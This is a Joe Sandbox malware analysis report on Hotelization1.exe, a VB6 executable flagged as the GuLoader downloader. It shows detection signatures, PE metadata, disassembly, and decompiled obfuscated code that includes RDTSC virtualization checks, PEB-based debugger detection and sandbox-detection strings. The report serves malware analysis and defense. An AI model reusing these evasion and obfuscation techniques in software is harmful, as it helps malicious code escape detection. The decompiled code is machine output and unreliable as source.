Play interactive tour

Edit tour

Analysis Report Hotelization1.exe

Overview

General Information

Sample Name:	Hotelization1.exe
Analysis ID:	356481
MD5:	e9fe792682164781809becea8a7a3902
SHA1:	ec474df86437d7d85b23b1e45de5b1c250ab56d6
SHA256:	0b2d52ea23f34796033d9d4f2bc2de17ad413e7fb82089faf7c55bc454a192cf
Tags:	exeGuLoader
Most interesting Screenshot:

Detection

GuLoader

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Yara detected VB6 Downloader Generic

Abnormal high CPU Usage

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to read the PEB

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

Hotelization1.exe (PID: 3360 cmdline: 'C:\Users\user\Desktop\Hotelization1.exe' MD5: E9FE792682164781809BECEA8A7A3902)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: Hotelization1.exe PID: 3360	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: Hotelization1.exe PID: 3360	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Hotelization1.exe

ReversingLabs: Detection: 21%

Compliance:

Uses 32bit PE files

Show sources

Source: Hotelization1.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Software Vulnerabilities:

Source: C:\Users\user\Desktop\Hotelization1.exe

Code function: 4x nop then jne 020E5481h

0_2_020E5491

System Summary:

Source: C:\Users\user\Desktop\Hotelization1.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_00402659	0_2_00402659
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_0040185A	0_2_0040185A
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_00402609	0_2_00402609
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_0040180D	0_2_0040180D
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_0040161E	0_2_0040161E
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_004028EF	0_2_004028EF
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_004026FA	0_2_004026FA
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_004026A4	0_2_004026A4
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_004024B5	0_2_004024B5
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_0040274C	0_2_0040274C
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_00402564	0_2_00402564
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_0040250C	0_2_0040250C
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_004027C8	0_2_004027C8
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_004027A7	0_2_004027A7
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_004027B6	0_2_004027B6
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_004025BC	0_2_004025BC

Source: Hotelization1.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal68.troj.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\Hotelization1.exe

File created: C:\Users\user\AppData\Local\Temp\~DF3AF5D2DA9F942D5F.TMP

Jump to behavior

Source: Hotelization1.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Hotelization1.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\Hotelization1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Hotelization1.exe

ReversingLabs: Detection: 21%

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: Process Memory Space: Hotelization1.exe PID: 3360, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: Hotelization1.exe PID: 3360, type: MEMORY

Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_00406437 push ds; iretd	0_2_00406439
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_00403EA3 push esi; retf	0_2_00403EBB
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_0040274C push eax; retf	0_2_0040274B
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_00402FFF push ds; ret	0_2_00403002

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\Hotelization1.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Hotelization1.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Hotelization1.exe

RDTSC instruction interceptor: First address: 00000000020E2761 second address: 00000000020E2761 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F6560A1C59Dh 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e cmp bh, ch 0x00000020 pushad 0x00000021 mov bh, 82h 0x00000023 cmp bh, FFFFFF82h 0x00000026 jne 00007F6560A1BC79h 0x0000002c popad 0x0000002d add edi, edx 0x0000002f test bl, al 0x00000031 dec ecx 0x00000032 cmp ecx, 00000000h 0x00000035 jne 00007F6560A1C53Fh 0x00000037 push ecx 0x00000038 test ah, 00000038h 0x0000003b call 00007F6560A1C588h 0x00000040 call 00007F6560A1C5ADh 0x00000045 lfence 0x00000048 mov edx, dword ptr [7FFE0014h] 0x0000004e lfence 0x00000051 ret 0x00000052 mov esi, edx 0x00000054 pushad 0x00000055 rdtsc

Source: C:\Users\user\Desktop\Hotelization1.exe

Code function: 0_2_020E2030 rdtsc

0_2_020E2030

Source: Hotelization1.exe

Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Source: C:\Users\user\Desktop\Hotelization1.exe

Code function: 0_2_020E2030 rdtsc

0_2_020E2030

Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_020E1A0A mov eax, dword ptr fs:[00000030h]	0_2_020E1A0A
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_020E1827 mov eax, dword ptr fs:[00000030h]	0_2_020E1827
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_020E4A9E mov eax, dword ptr fs:[00000030h]	0_2_020E4A9E
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_020E50DF mov eax, dword ptr fs:[00000030h]	0_2_020E50DF
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_020E50DA mov eax, dword ptr fs:[00000030h]	0_2_020E50DA
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_020E4358 mov eax, dword ptr fs:[00000030h]	0_2_020E4358
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_020E13C1 mov eax, dword ptr fs:[00000030h]	0_2_020E13C1
Source: C:\Users\user\Desktop\Hotelization1.exe	Code function: 0_2_020E25EE mov eax, dword ptr fs:[00000030h]	0_2_020E25EE

HIPS / PFW / Operating System Protection Evasion:

Source: Hotelization1.exe, 00000000.00000002.734355506.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: Hotelization1.exe, 00000000.00000002.734355506.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Hotelization1.exe, 00000000.00000002.734355506.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Hotelization1.exe, 00000000.00000002.734355506.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Process Injection1	OS Credential Dumping	Security Software Discovery211	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information2	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	System Information Discovery11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Hotelization1.exe	21%	ReversingLabs	Win32.Worm.Wbvb

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356481
Start date:	23.02.2021
Start time:	08:42:26
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Hotelization1.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.troj.evad.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 23.3% (good quality ratio 11.7%) Quality average: 23.9% Quality standard deviation: 25.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.478532768183019
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Hotelization1.exe
File size:	73728
MD5:	e9fe792682164781809becea8a7a3902
SHA1:	ec474df86437d7d85b23b1e45de5b1c250ab56d6
SHA256:	0b2d52ea23f34796033d9d4f2bc2de17ad413e7fb82089faf7c55bc454a192cf
SHA512:	5b399ebeef7b57a787f84f4e0b1b76818b6f4732f0099abebcd65a4cf8eed9874b9b0dacadb7d581c3afb4c1f61d598a91e4e04f4056a98e658f00c65d6240c8
SSDEEP:	1536:mZD/Ptb05trMj2cCGQnaOSRlZTbUYJ9nGEOWD:mZjdOtOtCGQnaO0lpbU+NGEOW
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L......T.....................0....................@................

File Icon


Icon Hash:	1e74f2ea62e4a082

Static PE Info

General
Entrypoint:	0x401494
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x54B5CFAE [Wed Jan 14 02:08:46 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b84199caadebcbcd5f63d7b7de7ff518

Entrypoint Preview

Instruction
push 0040A108h
call 00007F65609EE103h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax-6EB4BD71h], ah
dec edx
dec esi
stosb
mov cl, 2Eh
fcom st(0), st(2)
movsb
xchg byte ptr [ebp+00h], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx+6Fh], dl
je 00007F65609EE181h
je 00007F65609EE17Bh
insb
insb
jnc 00007F65609EE112h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
or esp, ecx
sbb byte ptr [ebx-50409C5Eh], cl
inc ebx
cmpsb
popfd
fild dword ptr [ebx+775E5EDAh]
jp 00007F65609EE0AAh
mov esi, BE15D362h
dec esi
mov al, byte ptr [ebx]
sbb dword ptr [edi+73F8EEF4h], ebx
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
jnc 00007F65609EE09Dh
add byte ptr [eax], al
adc eax, 00000009h
or al, byte ptr [eax]
imul ebp, dword ptr [esp+ebp*2+61h], 62617370h
insb
add byte ptr [42000901h], cl
imul ebp, dword ptr [esp+ebp*2+65h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf214	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0xc14	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x150	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xe7b4	0xf000	False	0.399593098958	data	6.01634189749	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x10000	0x1218	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0xc14	0x1000	False	0.264892578125	data	2.91279049322	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1236c	0x8a8	data
RT_GROUP_ICON	0x12358	0x14	data
RT_VERSION	0x120f0	0x268	MS Windows COFF Motorola 68000 object file	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaVarForInit, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaLateMemCall, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, __vbaVarForNext, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	Hotelization1
FileVersion	1.00
CompanyName	Log
ProductName	Log Inverter
ProductVersion	1.00
FileDescription	Log Inverter
OriginalFilename	Hotelization1.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: Hotelization1.exe PID: 3360 Parent PID: 5636

General

Start time:	08:43:18
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\Hotelization1.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Hotelization1.exe'
Imagebase:	0x400000
File size:	73728 bytes
MD5 hash:	E9FE792682164781809BECEA8A7A3902
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Hotelization1.exe PID: 3360 Parent PID: 5636 Hotelization1.exeCOMMON

Executed Functions

Function 0040250C, Relevance: 1.7, APIs: 1, Instructions: 468memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c6d3fa90bbacb3e39db3d591929567fd30cc151813f3efde6158f002d7a3a21c
Instruction ID: 0d525db0687830d79cbb7dfc4bc8784f6b90352e78fb14ba73424e03ab96fb83
Opcode Fuzzy Hash: c6d3fa90bbacb3e39db3d591929567fd30cc151813f3efde6158f002d7a3a21c
Instruction Fuzzy Hash: 1891CB5193EB44CAD217293486486715A48FF97343330EF7F85A7B50E166BE0E8B348E

Uniqueness

Uniqueness Score: -1.00%

Function 0040274C, Relevance: 1.7, APIs: 1, Instructions: 467COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 733a912c30e354f741c32ce3b54b758133867a609d4854968e97c9bdc89e876a
Instruction ID: b4e9a4c23d23ad757b346c541551b12a56f49f116a79650fbc4a570a89bb5fed
Opcode Fuzzy Hash: 733a912c30e354f741c32ce3b54b758133867a609d4854968e97c9bdc89e876a
Instruction Fuzzy Hash: A4B13341929A0AC5D2362920474C6735D48EBDE743360AA7BB45777EE1B6FE0E4F20CE

Uniqueness

Uniqueness Score: -1.00%

Function 004024B5, Relevance: 1.7, APIs: 1, Instructions: 453memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cdeacf573155539a6f861db5a89e019ac242204888c521808b97b5e3bad255ab
Instruction ID: aab9a92319504b058aa7f634347295290ed3dcfa6d06c2b4d2d3f785a59748fe
Opcode Fuzzy Hash: cdeacf573155539a6f861db5a89e019ac242204888c521808b97b5e3bad255ab
Instruction Fuzzy Hash: E391CC5193EA44CAD207293486486715A48FF97343331EF7F85A7B50E276BE0E8B348E

Uniqueness

Uniqueness Score: -1.00%

Function 00402609, Relevance: 1.7, APIs: 1, Instructions: 448memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7f1129f44dbb90d87104ac539c2a99fd7461946f00df92eb0f5aeef357d9c3b5
Instruction ID: 2355ec0259cf63e6cececad6eea7b84a194a73ddb5eee7f2dbd3200696348fbc
Opcode Fuzzy Hash: 7f1129f44dbb90d87104ac539c2a99fd7461946f00df92eb0f5aeef357d9c3b5
Instruction Fuzzy Hash: 6181BD5192EB44C9D217293082486715A48FF93347330EFBF85A7B50E2667E0E8B348E

Uniqueness

Uniqueness Score: -1.00%

Function 004026A4, Relevance: 1.7, APIs: 1, Instructions: 442memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b96869cc62eba2b0de128da7f4e22f55a3955551f39789b8063b7bfc4590d793
Instruction ID: e2f29a9591bed42ca6394765b2e3a56e55ada061bd010f34971208827d1c7cfb
Opcode Fuzzy Hash: b96869cc62eba2b0de128da7f4e22f55a3955551f39789b8063b7bfc4590d793
Instruction Fuzzy Hash: EE81AD5193EB44CAD217293082486715A48FF97347331EB7F85A7B60E1667E0E8B74CE

Uniqueness

Uniqueness Score: -1.00%

Function 00402659, Relevance: 1.7, APIs: 1, Instructions: 440
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 21%

			E00402659(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, signed long long __fp0) {
				void* _t58;
				void* _t59;
				intOrPtr* _t62;
				void* _t64;
				void* _t66;
				unsigned char _t105;
				void* _t125;
				void* _t127;
				void* _t128;
				void* _t139;
				void* _t140;
				void* _t164;
				void* _t165;
				void* _t167;
				void* _t168;
				void* _t169;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t196;
				void* _t198;
				void* _t200;
				void* _t201;
				void* _t202;
				void* _t277;
				void* _t279;
				void* _t280;
				void* _t340;
				signed long long _t358;
				void* _t359;
				void* _t360;

				_t358 = __fp0;
				_t191 = __edi;
				_t164 = __edx;
				_t125 = __ecx;
				_t58 = __eax;
				asm("pushad");
				_t105 = __ebx + 1;
				_pop(_t277);
				do {
					asm("fnop");
					_t165 = _t164 - 1;
					asm("punpcklwd xmm5, xmm3");
					asm("fprem");
					_t164 = _t165 + 1;
					asm("wait");
					asm("fninit");
					_t358 = _t358 / st5;
					asm("pcmpgtd mm4, mm0");
					_t127 = _t125 - 1 + 1;
					_t192 = _t191 - 1;
					asm("pxor mm6, mm4");
					asm("fdivr st7, st0");
					_t193 = _t192 + 1;
					asm("clc");
					asm("fabs");
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					_t105 = _t105 >> 0x3f;
					asm("aas");
					_t59 = _t58 - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					_t58 = _t59 + 1;
					asm("clc");
					_t128 = _t127 - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					_t125 = _t128 - 1 + 1;
					_t194 = _t193 - 1;
					asm("wait");
					asm("fyl2xp1");
					_t191 = _t194 + 1;
				} while (_t125 != 0);
				asm("wait");
				asm("fclex");
				asm("packsswb mm5, mm1");
				asm("fldl2t");
				asm("paddd xmm2, xmm0");
				_t62 = __imp__#690;
				asm("clc");
				asm("fst st1");
				asm("fdivrp st3, st0");
				_t195 = _t191 - 1;
				asm("psubusb xmm4, xmm5");
				asm("psraw xmm0, xmm3");
				_t196 = _t195 + 1;
				asm("packuswb xmm3, xmm5");
				asm("fyl2x");
				asm("fclex");
				asm("psrlq xmm7, 0xf4");
				asm("clc");
				_t359 = _t358 - st3;
				asm("f2xm1");
				_t167 = _t164 - 1 + 1;
				asm("fcomp st0, st3");
				asm("emms");
				asm("cld");
				asm("fclex");
				asm("wait");
				_t139 = 0x905a4d;
				_t279 = _t277 - 1 + 1;
				asm("fprem1");
				asm("wait");
				asm("fclex");
				asm("clc");
				do {
					_t280 = _t279 - 1;
					asm("paddusw xmm1, xmm7");
					asm("fldl2t");
					_t279 = _t280 + 1;
					_t64 = _t62 - 1 + 1;
					asm("fldl2e");
					asm("fst st1");
					_t62 = _t64 - 1;
					asm("clc");
					_t140 = _t139 - 1;
					asm("fnop");
					asm("psubusb xmm4, xmm5");
					_t139 = _t140 + 1;
					_t340 =  *_t62 - _t139;
					asm("invalid");
					asm("fscale");
					asm("packuswb xmm3, xmm5");
					asm("invalid");
				} while (_t340 != 0);
				_t168 = _t167 - 1;
				asm("fsin");
				asm("fclex");
				_t169 = _t168 + 1;
				_t66 = _t62 - 1 + 1;
				asm("fldz");
				_t360 = _t359 - st3;
				_t198 = _t196 - 1 + 1;
				asm("pcmpgtw mm6, mm2");
				asm("fcomp st0, st3");
				asm("clc");
				asm("cld");
				asm("fxch st0, st1");
				asm("fclex");
				_t200 = _t198 - 1 + 1;
				asm("fdecstp");
				asm("fprem1");
				_t201 = _t200 - 1;
				_t202 = _t201 + 1;
				asm("pcmpeqb mm3, mm6");
				asm("paddusw xmm1, xmm7");
				asm("int1");
				if (0x45f5 <= 0) goto L53;
				_push(es);
			}

0x00402659
0x00402659
0x00402659
0x00402659
0x00402659
0x00402659
0x0040265a
0x00402698
0x00402699
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402742
0x00402743
0x00402744
